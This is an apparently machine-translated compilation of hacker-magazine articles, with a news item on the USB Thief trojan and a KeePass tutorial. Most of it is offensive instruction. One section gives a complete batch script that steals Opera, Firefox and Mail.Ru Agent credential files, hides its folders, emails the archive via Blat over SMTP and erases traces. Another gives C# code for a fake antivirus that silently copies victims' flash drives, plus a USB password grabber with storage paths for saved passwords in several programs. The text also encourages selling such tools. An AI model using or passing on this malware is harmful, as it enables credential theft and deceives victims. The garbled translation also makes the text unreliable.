An extremely unusual Trojan: the malware was named USB Thief (Win32/PSW.Stealer.NAI). The malware is focused on stealing data, it spreads and works on ordinary flash drives, and also skillfully hides traces of its presence in the system. The Trojan is ideal for cyber espionage, as it can even reach systems that are isolated from the network if a USB drive can be connected to them.
Unlike other USB threats that stick to startup and forge application shortcuts in order for the malware to start, USB Thief works differently. The Trojan is designed to take advantage of the fact that users often store portable versions of applications such as Firefox, NotePad++, TrueCrypt, and so on on flash drives. Malware is neatly integrated into the download chain of such programs, posing as a plugin or DLL file. Thus, when a user launches a familiar application from a flash drive, a Trojan is launched along with it (in the background).
The unknown author of the malware took care of serious protection for his development. USB Thief binds to each infected flash drive using its unique ID and drive settings. Some of the Trojan's files are protected by AES128 encryption, and the key is generated based on the unique parameters of the device. Also, the names of the malware files differ in each case: they are generated based on the contents of the flash drive and the time the files were created. When trying to copy USB Thief to another flash drive or regular hard disk, this two-stage protection system will prevent malware from working, and will also seriously complicate reverse engineering.
Trojan structure
USB Thief works directly from the flash drive and leaves no traces on the system itself. The Trojan consists of six files, four of which are executable and two contain configuration data. The first loader is responsible for launching the Trojan along with a portable version of a program. He checks the USB device and makes sure that he can write the stolen information to it and store it here. Then the second loader starts. It checks the names of the parent processes and makes sure that it is running in a normal environment (and no one is trying to parse it). The third loader, in turn, checks for antiviruses in the system.
The last, fourth payload that is embedded in running process, is directly responsible for data theft. USB Thief steals documents, images, list of files from all available drives, data Windows Registry and information collected by WinAudit. All stolen data is stored on a flash drive and encrypted using elliptic cryptography.
ESET experts note that attacks from using USB Thief is not yet a common practice. However, the Trojan is very dangerous, since it is difficult to detect its presence, and after removing the USB drive, no traces of information theft remain at all. The company’s report also states that the author of the malware, if desired, can “repurpose” his malware by replacing the payload for data theft with any other malware.
In this article I will describe how quickly and without much difficulty, write and make a virus that steals files with passwords and sends it all to the mailbox.
Let's start with the fact that the virus will be written in bat "e (CMD, you can take the basic commands) that is, in the usual text file and will be executed using the standard, built-in Windows interpreter - "command line".
In order to write such a virus, you need to know the exact storage location of those files that it will steal, Blat components that can be downloaded from the off site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code into it:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
I won’t write a lot of the code of the Batinka itself.
@echo off - hides the body of the butt (so it's not needed, but still)
md %systemroot%\wincs - creates a wincs folder in system folder Windows, no matter what drive it's installed on or what it's named.
md %SystemDrive%\pass\ - creates a pass folder on the drive where Windows is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder where wand.dat and cookies4.dat from Opera browser(up to 11* versions, opera stores its passwords in the wand.dat file)
md %SystemDrive%\pass\Mozilla\- creates a Mozilla folder where files from Mozilla browser(cookies.sqlite ,key3.db ,signons.sqlite ) in which passwords are stored.
md %SystemDrive%\pass\MailAgent\- creates a MailAgent folder into which files containing the history of correspondence and registry keys (storing passwords) from the Mail Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg- creates a folder reg
attrib %systemroot%\wincs +h +s +r- puts attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r- the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copies the blat.exe file from the download location to the wincs folder
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copies the blat.dll file from the download location to the wincs folder
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copies the blat.lib file from the download location to the wincs folder
CD /D %APPDATA%\Opera\Opera\ - goes to the opera folder where files with passwords (and not only) from the opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat- copies the wand.dat file to the opera folder
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exports the magent_logins2 registry key where the password is stored to the reg folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exports the magent_logins3 registry key where the password is stored to the reg folder
CD / D %APPDATA% - go to the AppData folder
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copies the contents of the Mra\Base folder to the MailAgent folder
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copies the ver.txt file to the MailAgent folder
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- go to the folder with the Mozilla browser profile
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copies key3.db file to Mozilla folder
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copies the WinRar Rar.exe archiver component to the pass folder
del /s /q %SystemRoot%\Rar.exe- removes the archiver component from the Windows folder
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archive the contents of the pass folder
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copy the created archive to the wincs folder
cd %systemroot%\wincs - go to the wincs folder
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program to send the archive by specifying the data for authorization and sending the letter. Do not forget to specify your data from the mailbox from which the letter with the archive will be sent.
ren *.rar pass.rar - just in case the archive did not take the wrong name during the process, we will rename it to pass.rar again
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -attach %systemroot%\wincs\pass.rar- indicate to which postal address the letter will be sent and send it.
rmdir /s /q %SystemDrive%\pass- delete the pass folder
rmdir /s /q %systemroot%\wincs- delete wincs folder
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- remove the Blat components from the Windows folder.
del /s /q %systemroot%\blat.lib- remove the Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe- we put attributes on ourselves, thereby hiding ourselves from the eyes.
EXIT - complete the batink process and exit.
cls - clear the output of any lines in the intraperator.
Copied, save as wind.bat and compile to exe using Bat programs to exe converter, then we collect everything together, that is, we take the Blat program components and the WinRar archiver component (you can download it) and glue it into one executable file, or with some program, the path to unload all files should be% SystemRoot% or% WindowsDir % or %windir% .
As a result, we get a virus that will not be fired by antiviruses and will send an archive with files to your mail. The files that come to the mail can be decrypted using multi-password-recovery, though not all, but only wand.dat from the opera, and then if it was not updated to 11 * versions. All other files can be decrypted by replacing them with your own.
I think this is the end of it, if you have any questions feel free to ask.
Thank you for your attention, all the best!
©Swap TheHackWorld.in
Many companies, including Sony and Adobe, have already become victims of hackers who have stolen millions of passwords and other user data. Analysis of this information showed that many users often use either weak passwords like "123456" or the same password for many services. This greatly facilitates their task for hackers, and at the same time, such carelessness can be understood: who is able to remember more than a dozen complex passwords?
A simple solution could be a piece of paper taped under the keyboard. Not a single hacker will be able to encroach on it, but you will have to constantly monitor people who are near your computer. And this sheet is of no use if you want to log into your account from someone else's computer.
The free tool KeePass 2 Portable solves this dilemma. For its operation, you only need a USB flash drive with 10 MB of free space, on which you will install an auxiliary program. In the future, you will need to remember only one password - from the protected area of \u200b\u200bthe flash drive. After all, in it KeePass saves the login data to your web services in the form of an encoded data bank, protected by a master password.
Trojans stealing passwords won't be able to sniff out anything. And since you no longer need to remember dozens of passwords, you can use a new one for each web service, really. strong password. Now we will tell you in detail how to use KeePass.
How to do it
1 Install a password safe
Install a password safe
Insert a USB flash drive into the PC, create a new folder on it and copy the contents of the archive with the KeePass software there. Run the KeePass.exe program. After launch, activate automatic search updates by clicking on "Enable" in the pop-up window. Then choose "View | Change Language" and click "Get more languages".
Download the Russian language file from the site that opens by clicking on “Russian | 2.25+". Extract the contents of the archive to a USB drive. Click again on "View | Change Language", select "Russian" and restart KeePass by pressing the "Yes" button.
2 Create a new password database
Create a new password database
Select "File | New" and specify the USB drive as the password storage. In the next window, the program will prompt you to set the main password. You will need to enter it every time you start KeePass.
3 Activate Protected Mode
Activate Protected Mode
To prevent the Trojan from reading your password for KeePass, you should use the protected mode of the program to enter it, similar to UAC in Windows 7. To do this, in KeePass, go to “Tools | Settings | Security", move to the very bottom of the window and check the box next to "Enter master password in secure mode".
4 Populate the database with passwords
Populate the database with passwords
KeePass can sort passwords into groups. By default, your new password bank has groups like "OS" or "Internet". To create new record, select the appropriate group (or create a new one), right-click on the white area on the right and then click on "Add Entry".
Fill in all fields and click OK. Since you no longer need to remember passwords to log in to each account, you can set up new, more complex ones that can be generated, for example, at passwort-generator.com.
5 Use automatic authorization
If you want to sign in to the service using KeePass, open the group where the corresponding password is stored. Right click mouse click on the corresponding storage entry KeePass passwords and select "Start Autodial" from the drop-down list. After that, the program will transfer your data to the browser, and the browser will open a new window where you will log into your account.
Please note that in the "URL" field you must enter the URL that you usually enter in the browser for authorization, otherwise automatic password entry through KeePass will not work.
6 Extend KeePass
Extend KeePass
If you want to extend the functionality of KeePass, go to "Tools | Modules | More modules”, after which you will be redirected to the site with useful extensions(our recommendations can be found in the table above). Now, by clicking on the name of the plugin, download it and extract it to a flash drive.
Restart KeePass and navigate to Tools | Modules. A list of available plugins will be displayed at the bottom (some of them can be configured).
The Best Extensions for KeePass
Equip your safe with passwords additional features, for example the function Reserve copy or transmission of a password for mobile phones.
Name |
Description |
| DataBaseBackup | Sets password bank protection in case the USB drive is stolen or lost. |
| Twofish Cipher | |
| KeeAgent | Adds an encoding algorithm that is almost impossible to crack; note that this will make KeePass run slower. |
| KeyExchanger | Adds an encoding algorithm that is almost impossible to crack; note that this will make KeePass run slower. |
| KeeForm | Opens your favorite sites with the click of a button and automatically fills in your login details. |
For mere mortals, a flash drive is a device for transferring documents / films / photos and other personal (and sometimes very personal) information. But for hackers, a flash drive is both a victim and a combat tool. Today I will tell you all the subtleties of imperceptibly draining data from flash drives to my computer, and I will also teach you how to turn harmless flash drives into programs for backing up passwords from a “big” computer.
Trap for other people's flash drives
The idea of the "Evil Computer" program will be as follows. We will develop a small tool that will pretend to be a super-mega advanced antivirus, the purpose of which is to qualitatively remove “dangerous” viruses from flash drives. You won’t surprise anyone with a virus-infected flash drive, so our specialized “anti-virus” will not cause concern in a gullible user. On the contrary, inserting a USB flash drive into your computer and seeing a message like: "Virus detected. I make a detailed scan of all files for the presence of infected ", - it will definitely wait for the completion of this operation.
Instrument preparation
write so useful program we will be on the now fashionable C#. The flexibility of the language and the rich functionality of the .NET platform allow you to develop applications at lightning speed. This is exactly what we need. We are interested in the harvest that we can harvest, not the tedious process of coding.
One of the important components of our application will be the interface. The more solidly you make it, the more likely it is that the victim will not notice the catch and will calmly wait for the completion of the anti-virus scan. I didn’t bother too much and placed only a picture and a ProgressBar on the form of a clean project. You can have a blast and make a mind-blowing design. I advise you to look at the design of some real antivirus and design your application in approximately the same style.
We set the task
We will assume that we have decided on organizational issues and the algorithm of action, it's time to discuss the technical nuances. So, our antivirus should start its dirty work during the installation of the flash drive. Once new disk appears in the system, our program must determine its letter and start copying.
Before I undertook to write this article, I came across the source code for such a program. The author of the example determined the presence of a flash drive by periodically enumerating all disks for the presence of a drive of the type " removable media". At first I thought to go the same way, but an inner voice suggested irrationality. After weighing all the "pros" and all the "well, it's on," I discarded this idea and went for a walk on MSND. Five minutes later it turned out that I had done it for good reason. The answer has been found!
Without WinAPI, nowhere ...
The most effective way to find out about connecting new equipment (in our case, flash drives) is by catching and analyzing the WM_DEVICECHANGE message. During the installation of the device, the message is sent to all windows, and we can easily process it in our application. To do this, it is enough just to describe the WindowProc function. In practice it looks like this:
LResult CALLBACK WindowProc (HWND hwnd, //window id UINT uMsg, //message id WPARAM wParam, //event that occurred LPARAM lParam //pointer to structure containing data)
In the body of the function, you need to compare the value of the WParam parameter with the IDs of various events related to the WM_DEVICECHANGE message. For our example, these would be:
Okay, we know how to establish the fact of connecting new equipment, but how to be sure that you connected a USB flash drive? There are a lot of hot-pluggable devices (I'm talking about usb) (printer, scanner, modem, etc.). Fortunately, this problem is solved quite simply. Using the LParam parameter, we can refer to the _DEV_BROADCAST_HDR structure, which has a dbch_devicetype field. Here, based on the value of this field, the appropriate conclusions are drawn. If it is equal to DEV_DEVTYP_VOLUME, then it's time to rejoice and clap your hands - a flash drive has been connected to us!
Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //DWORD structure size dbch_devicetype; //Device type DWORD dbch_reserved; //Reserved, not used )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
A USB flash drive was inserted into our pisyuk - let's try to find out the drive letter that the system assigned to it. As in the "Field of Miracles", you can guess it, but it's better to pull the information out of the DEV_BROADCAST_VOLUME structure.
Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //DWORD structure size dbcv_devicetype; //Device type DWORD dbcv_reserved; //Reserved DWORD dbcv_unitmask; //Drive letter bitmask WORD dbcv_flags; // )DEV_BROADCAST_VOLUME, *PDEV_BROADCAST;
Of all the fields in this structure, we are interested in dbcv_unitmask. Note that this property contains only a bit of the letter, not its symbolic representation. For example, if the value is 0, then the drive letter will be A; if 1, then B, etc. For the convenience of obtaining a symbolic letter, it is best to write a function.
If you have been reading our column for a long time and are familiar with API functions, then there is no need to read the next part of the article. Open the editor and start sculpting applications. I have described all the necessary structures and functions; you just have to put them together in the program. Make up your mind, and I will start diving into .NET and C # in particular.
Let's hit .NET "ohm
Time to start practicing and apply your knowledge to the C# language. "What the heck? - you ask. - I talked half the article about WinAPI, but then I just stupidly decided to issue a call to all functions in the form of native code? Where is the claimed lightning speed of development?
In something you are right. Our application will indeed use WinAPI functions (no easier way), but we will not describe them ourselves. Many developers faced the problem of determining flash drives. As a result of these skirmishes, free classes for C # began to appear, in which all the necessary functionality has already been implemented. We just have to connect such a blank (read component) to our project and call a couple of methods. We will use one of these classes now. But knowledge of the structures described above will definitely come in handy when porting this program to the Windows API.
There are a lot of ready-made classes that solve such problems, but I liked Jan Dolinay's version the most. This person wrote a very easy-to-use and understandable DriveDetector class that can:
And most importantly, this class is extremely easy to work with - you will see this now. Connecting a class to your project is done in a standard way, and there is no point in dwelling on this. So let's move on to initialization. It is done like this:
FlashDriveDetector = new DriveDetector(); flashDriveDetector.DeviceArrived += new DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += new DriveDetectorEventHandler(OnDriveRemoved);
After instantiating an object of the DriveDetector class, I define the DevieArrived() and DriveRemoved() event handlers. By their name, it is not difficult to guess what they are responsible for. All initialization code is best written in the Form1() method. The main code of our program will be in the DeviceArrived event handler. You can see his text in the sidebar:
String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(dirName); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += new IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += new CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashcopier.Overwrite = true; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Define other filters //.... flashcopier.StartCopy();
At the very beginning of the listing, I define the path to the folder where we will copy the contents of the flash drive. We will copy to the “flash_current date” directory located along with the folder from which our application is launched - it’s more convenient. Having decided on a folder name, I try to create it using the CreateDirectory() function. I wrote this function solely for convenience. It creates an instance of the DirectoryInfo object designed to work with directories, and calls its Create () method, which creates a new folder.
After creating a folder, you can copy. I copy all files using an object of type xDirectory. If you type the code from the listing yourself, then when you try to compile, the compiler will generate an error in which it will say in black and white: "An object of this type was not found."
The point is that xDirectory is a third-party class. Once upon a time, I found it on the Internet and since then I often use it in my projects. I like it because it is enough to call one method to copy subfolders. In addition, it allows you to set filters.
Really do without it. We take standard classes, a technique well known to all programmers - recursion - and write a couple of dozen lines of code. Alas, I absolutely do not want to do this. It’s the 21st century in the yard, we need to optimize our actions to the maximum and xDirectory will help us with this.
The module with the class is on our disk, and you can find out about the purpose of the methods/properties/events by looking at the corresponding table.
properties of the xDirectory class
xDirectory Class Methods
Try to run our application and insert a flash drive. After a few seconds (depending on the clutter of your flash drive), all the contents of the usb drive will be transferred to the folder from which you launched the freshly baked application.
USB grabber
Now let's consider the inverse problem and talk about the nuances of creating the so-called. flash drive grabber. The principle of creation is exactly the same. You need to write a simple application that will automatically run after installing the flash drive.
In the process of work, the application will go through the folders / registry keys in which popular programs store saved passwords and, if possible, copy all the information to one of their folders. So that your autorun does not arouse suspicion among the poor user, take the trouble to carefully disguise it. For example, under the launch-menu.
You are probably aware that the so-called portable versions of applications have become very popular now, that is, programs that can work directly from a flash drive. This is the best way to play. Design the program in the appropriate style and, for plausibility, throw in a few buttons designed to launch any programs. My design is shown in the picture.
How are we going to rob?
I must say right away that there is no need to perform super-hacker actions here. Most programs store personal data in the Documents and Settings\User\Application Data\%ProgramName% folder or in the registry. ProgramName means any program. If you are faced with the first option, then you will have to use the already familiar xDirectory class (or standard methods for working with files) and copy everything you need with it. In the second case, you will have to work with the registry. I won’t give an example of copying files (we’ve already considered it), but I’ll show you how to interact with the registry using .NET tools (using the example of determining the path to the TC folder):
RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" software\\Ghisler\\ Total Commander"); string key = (string) readKey.GetValue("InstallDir");
That's all. There will be no more code. This knowledge should be enough for you to pull off files with valuable information. To make things a little easier, I have prepared a list of the most popular programs and painted all the ways in which they store the saved user data.
Mail Agent
Messenger from Mail.ru is now very popular among mere mortal users (especially among women). The goals are clear, the tasks are set, so we are interested in:
gTalk
Company Google creates convenient and functional products, among which there is a gabber client - gTalk. Today gTalk not very popular yet. It is not installed on every second PC, but sometimes it still occurs and, in order to be in the subject, it is better to immediately teach our program to get passwords from this messenger as well. Passwords for all gTalk accounts are stored in the registry - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . This branch lists all accounts that have ever been signed in to gTalk. Account passwords are stored in string parameter pw.
Total Commander
Total Commander- by far the most popular file manager. The program contains approximately a wagon and a small cart (and the same number can be attached to it using additional plugins). We are only interested in the built-in FTP client. It is used by many, and passwords, of course, are saved.
TC, unlike many other programs, does not store passwords in the registry, but uses the good old ini files. Passwords, as well as all the necessary data to connect to the servers (ip, port, username, etc.) Total Commander stores in a file wcx_ftp.ini, which is innocently located in the program folder. Path to the directory where it is installed Total Commander, you can find out from the registry. Look in the HKEY_CURRENT_USER\Software\Ghisler\Total Commander branch.
firefox
Today, a browser is not just a program for WEB travel, but a whole combine that, in addition to various possibilities, stores a lot of confidential information. A typical example of this is web forms. 99% of modern sites require registration. Remembering and constantly keeping in mind the login / password combination for each site is an unrealistic task, especially if you are an advanced user and surfing the Internet is not limited to Odnoklassniki and VKontakte alone.
The developers have made life easier for users and have built in the so-called "password vaults" into the programs. I registered, logged in under my account, ordered the browser to remember the credentials - and forgot. The next time you visit, all that remains is to perform a couple of mouse clicks, and you are already on the site. Since the browser saves passwords, it means that we have the opportunity to steal its entire database.
All these files are located in the familiar Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .
Opera
Opera- a browser that is very popular among Russian users. Naturally, we cannot leave it unattended. So, with Opera the situation is about the same as with FireFox. All passwords saved in the browser are stored at Document and Settings\%UserName%\Application Data\Opera\profile in the wand.dat file. It turns out that when Opera is detected, we will act in the same way as in the case of firefox.
Skype
The popularity of Skype is growing every day. Many people use it not as a means of making calls, but for a banal convenient chat. All confidential data, as expected, is located in the user profile (in the same place where Opera or FF stores them). To "privatize" them, you will have to copy the user profile from Document and Settings\%userName%\Application Data\Skype\ and export the registry branch - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .
QIP
Like most of the programs described earlier, QIP stores all saved passwords in Application Data\qip .
Copying completed
.NET technology has greatly simplified our task, as a result of which all coding has been reduced to calling a few methods. Of course, you can say that this is not cool and that such things are much more efficient to write in WinAPI or ASM "e. In some ways, I agree with you, but keep in mind, on WinAPI and, especially, on Asma, write such a program like this but you won't succeed quickly.While others write kilometer-long code, you and I will harvest.Good luck in programming, and if you have any questions, please write to the soap.
Do not forget, many users store confidential information in the "My Documents" folder. At a minimum, there may be interesting working documents, and sometimes entire files with passwords. At one time (at my former job) I found on the accountant's computer a neatly formatted file with passwords for bank clients.
As a true friend, you have to help all these people back up their sensitive information.
Many hacker forums have a lot of ads for the sale of this kind of software. Different prices - from 10$ to 100$. Having finalized the examples discussed in the article, you can earn a crust of black bread with caviar. I repeat, the main thing is to approach the matter creatively, and everything will definitely work out. Again, it is not detected by antiviruses;).
Warning!
We use this program exclusively for timely backup of the contents of flash drives to disk and backup of passwords to a flash drive. And what did you think? Illegal use of such software is punishable!